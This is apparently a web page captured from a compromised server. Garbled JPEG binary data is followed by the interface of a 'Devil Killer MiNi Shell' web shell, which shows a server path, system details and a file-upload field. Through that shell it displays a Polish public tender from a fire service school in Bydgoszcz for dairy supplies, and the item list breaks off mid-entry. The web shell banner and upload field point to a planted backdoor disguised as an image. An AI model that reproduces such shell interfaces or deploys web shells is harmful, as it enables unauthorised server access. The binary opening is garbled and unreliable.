JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241126/0061705501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> dostawa mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODOFICERSKA PAŃSTWOWEJ STRAŻY POŻARNEJ W BYDGOSZCZY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SP PSP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090585370</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Glinki 86</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-861</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48523498400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+4852 3753077</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> dostawa mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93bea06e-c651-47b0-b7e3-32aa94d9b88b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00617055</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00213608/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-93bea06e-c651-47b0-b7e3-32aa94d9b88b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2.	Forma komunikacji: w postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia https://ezamowienia.gov.pl<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy e-Zamówienia (dostępnym pod adresem: <br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy e-Zamówienia (dostępnym pod adresem: <br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu) <br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>6.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę e-Zamówienia.<br/>7.	Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO” informuję, że:<br/>1.1	Administratorem Pani/Pana danych osobowych jest Komendant Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy, ul. Glinki 86, 85-861 Bydgoszcz, tel. 52 349 84 90, e-mail: sekretariat@sppsp.bydgoszcz.pl.<br/>1.2	W Szkole Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy wyznaczony został Inspektor Ochrony Danych, mail: iod@sppsp.bydgoszcz.pl.<br/>1.3	Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. w celu związanym <br/>z postępowaniem o udzielenia zamówienia publicznego na dostawę mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy SPT.2370.11.2024.<br/>1.4	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”.<br/>1.5	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>1.6	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących, jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>1.7	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>1.8	Posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania <br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.9	Nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. B, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wykonania wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu, w tym obowiązki wynikające z RODO. W związku z powyższym, Wykonawca zobowiązany jest do złożenia <br/>w niniejszym postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnienie przez niego obowiązków informacyjnych przewidziany <br/>w art. 13 lub art. 14 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPT.2370.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	mleko 2%, opak. 1l, wartość odżywcza w 100g to 50kcal, tłuszcz min. 2g, białko min. 3,2g, sól max. 0,10g, węglowodany 4,8g, w tym cukry 4,8g.	1000	l<br/>2	mleko 3,2% opak. 1l, wartość odżywcza w 100g: tłuszcz min. 3,2g, węglowodany min. 4,7g w tym cukier max. 4,7g, białko min. 3,0g, sól max. 0,1g	100	l<br/>3	śmietana ukwaszona 18%, opak. 200g, wartość odżywcza w 100g: tłuszcz min. 18g, węglowodany min. 3,1g w tym cukier max. 3,1g, białko min. 2,6g, sól max. 0,11g	900	kg<br/>4	kefir naturalny, opak. od 300 – 400g, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany min. 4,6g w tym cukier max. 4,6g, białko min. 3,6g, sól max. 0,10g	50	kg<br/>5	jogurt naturalny, opak. 150 – 200g, wartość odżywcza w 100g: tłuszcz min. 2,5g, węglowodany min. 5,8g w tym cukier max. 5,8g, białko min. 4,3g, sól max. 0,1g	200	kg<br/>6	ser żółty typu gouda, opak. od 1,5 – 3,5kg tłuszczu min. 40%, 900	kg<br/>7	ser żółty typu salami, opak. od 1,5 – 3,5kg tłuszczu min. 40%, 500	kg<br/>8	ser biały twaróg półtłusty, opak. 0,5 - 1,5kg, wartość odżywcza w 100g: tłuszcz min. 4g, węglowodany 4,6g w tym cukry max. 4,6g, białko min. 17g	1200	kg<br/>9	twarożek ziarnisty typu grani, opak. od 100 – 200g, wartość odżywcza w 100g: tłuszcz min. 5g, węglowodany w tym cukry max. 2,5g, białko min. 11g<br/>350	kg<br/>10	maślanka naturalna, opak. 1l karton, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany w tym cukry max. 5g, białko min. 3,5g	200	l<br/>11	ser typu fromage, opak. 80 – 100g, wartość odżywcza w 100 g: tłuszcz min. 31g, węglowodany min.4 g w tym cukry max. 4g, białko min. 12g	100	kg<br/>12	maślanka owocowa, opak. 1l karton, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany w tym cukry max. 13g, białko min. 3,2g	100	l<br/>13	jogurt typu greckiego, opak. 400g, wartość odżywcza w 100 g: tłuszcz min. 9g, węglowodany w tym cukry max. 5g, białko min. 3,6g	50	kg<br/>14	ser wędzony typu królewski kl. I podpuszczkowy dojrzewający, opak. 1,5 – 3,5kg lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych tłuszczu min. 40%, zwartość laktozy ≤0,01%	100	kg<br/>15	masło śmietankowe min. 82% tłuszczu, opak. 200g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 83g, węglowodany w tym cukry max. 0,8g, białko min. 0,6g	2500	kg<br/>16	margaryna typu palma, opak. 250g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 72g, sól. max. 0,3g	50	kg<br/>17	śmietanka UHT do kawy typu łaciata opak.10x10ml=100ml. lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100 ml :tłuszcz min. 10g, kwasy tłuszczowe min. 6,0g, węglowodany min. 4,5g, cukier max. 4,5g, białko min. 2,9g, sól max. 0,10g.	100	l<br/>18	śmietanka 36% typu łaciata, opak.1l, lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 36g, węglowodany min. 2,9g w tym cukier max. 2,9g, białko min. 2g	150	l </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15511000-3 - Mleko</p> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15431100-9 - Margaryna</p> <p class="mb-0">15512000-0 - Śmietana</p> <p class="mb-0">15551300-8 - Jogurt</p> <p class="mb-0">15551310-1 - Jogurt bez dodatków substancji smakowych</p> <p class="mb-0">15544000-3 - Ser twardy</p> <p class="mb-0">15542100-0 - Ser twarogowy</p> <p class="mb-0">15551500-0 - Maślanka</p> <p class="mb-0">15512100-1 - Śmietana chuda</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.2 Ocena ofert zostanie dokonana według następujących zasad:<br/>a) cena oferty C – proporcjonalnie wg wzoru - maksymalna ilość punktów 60.<br/>	<br/>	najniższa oferowana cena brutto <br/>	C =  x 100 pkt. x 60%<br/> cena brutto oferty badanej <br/><br/>b) czas dostawy zamówień interwencyjnych Cz - proporcjonalnie wg wzoru - maksymalna ilość punktów 40.<br/>Lp.	Oferowany czas dostawy zamówień interwencyjnych:	Liczba przyznanych punktów za oferowany czas dostawy.<br/>1.	do 1h	100 pkt.<br/>2.	od 1h do 2h 50 pkt.<br/>3.	od 2h do 4 h 25 pkt.<br/>4.	powyżej 4h 0 pkt<br/><br/>Cz = ilość przyznanych punktów za podany czas dostawy zamówień interwencyjnych / wg tabeli / x 40%<br/><br/>Jeżeli Wykonawca nie wpisze wymaganych danych dot. czasu dostawy zamówień interwencyjnych <br/>w formularzu ofertowym stanowiącym załącznik nr 1, wówczas Zamawiający przyjmie najdłuższy czas dostawy. <br/><br/>Zwycięży oferta, która uzyska najwyższą ilość punktów po przeliczeniu udziału procentowego w każdym kryterium – dot. każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy zamówień interwencyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	jogurt owocowy mały różne smaki, opak.120 – 180 g, wartość odżywcza w 100g: tłuszcz min. 2,2g, węglowodany min. 14g w tym cukry max. 14g, białko min. 3,1g, sól max. 0,10g	700	kg<br/>2	serek homogenizowany różne smaki, opak. od 100 – 150g, wartość odżywcza w 100g: tłuszcz min. 6,5g, węglowodany min. 16g w tym cukry max. 13g, białko min. 16g, sól max. 1,8g	450	kg<br/>3	serek maślany kanapkowy różne smaki, opak.130 – 150 g, wartość odżywcza w 100g: tłuszcz min. 23g, węglowodany min. 3g w tym cukry max. 3g, białko min. 6g, sól max. 0,70g	550	kg<br/>4	serek topiony kostka różne smaki, opak. 100 g wartość odżywcza w 100g: tłuszcz min. 27g, węglowodany min. 6g w tym cukry max. 3g, białko min. 7g, sól max. 0,10g	200	kg<br/>5	serek topiony kiełbaska, opak. 100 – 120g, wartość odżywcza w 100g: tłuszcz min. 26g, węglowodany min. 1,9g w tym cukry max. 1,2g, białko min. 16g, sól max. 1,8g	300	kg<br/>6	serek smażony z kminkiem i bez kminku, opak.100 – 200g, wartość odżywcza w 100g: tłuszcz min. 4,3g, węglowodany w tym cukry max. 1,2g, białko min. 10g, sól max. 1,6g	100	kg<br/>7	ser sałatkowo kanapkowy, opak. 200 – 300g, wartość odżywcza w 100g: tłuszcz min. 12g, węglowodany w tym cukry max. 0,5g, białko min. 10g, sól max. 3g	150	kg<br/>8	ser topiony w krążkach, opak.180 – 200g, wartość odżywcza w 100g: tłuszcz min. 18g, węglowodany w tym cukry min. 5,8g max. 6,2g, białko min. 9,4g, max 10g, sól max. 2,6g	100	kg<br/>9	ser pleśniowy, opak. 120 – 300g wartość odżywcza w 100 g: tłuszcz min. 31g węglowodany 1,3g w tym cukry max. 0,5g, białko min.18 g, sól max 1,7g	100	kg<br/>10	ser topiony wędzony, opak. 90 – 110g wartość odżywcza w 100g: tłuszcz min. 18g węglowodany w tym cukry max. 1,2g, białko min. 18g, sól max 2,2g	30	kg<br/>11	deser typu satino, waniliowo - czekoladowy z bitą śmietaną, opak. 120 – 180g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 2,6g, węglowodany min. 14,2g w tym cukier max. 10g, białko min. 2,2g	300	kg<br/>12	deser typu monte, opak. 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 13,3g, węglowodany min. 15,9 g w tym cukier max. 13,7g, białko min. 2,8g	500	kg<br/>13	ser mozzarella, opak. 125g wartość odżywcza w 100g: tłuszcz min. 19g węglowodany w tym cukry max. 1g, białko min. 18g, sól max 0,5g	200	kg<br/>14	serek typu danio, opak. 130 g – 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 2,8g, węglowodany min. 15,8g w tym cukier max. 15g, białko min. 5,3g	500	kg<br/>15	deser typu kinder mleczna kanapka, opak. 28g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 27,9g, węglowodany min. 34g w tym cukier max. 29,5g, białko min. 7,9g	20	kg<br/>16	ryż na mleku typu belriso, opak. 180 – 200 g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 3,8g, węglowodany min. 16,7g w tym cukier max. 10g, białko min. 3,2g	400	kg<br/>17	deser mleczny typu monte choco różne smaki, opak. 125g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: mleko min. 44%, tłuszcz min. 0,7%, czekolada w proszku min. 0,4%	100	kg<br/>18	serek puszysty, różne smaki typu Piątnica, opak. 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 21g, węglowodany min. 5g w tym cukier max. 3,4g, białko min. 6g	250 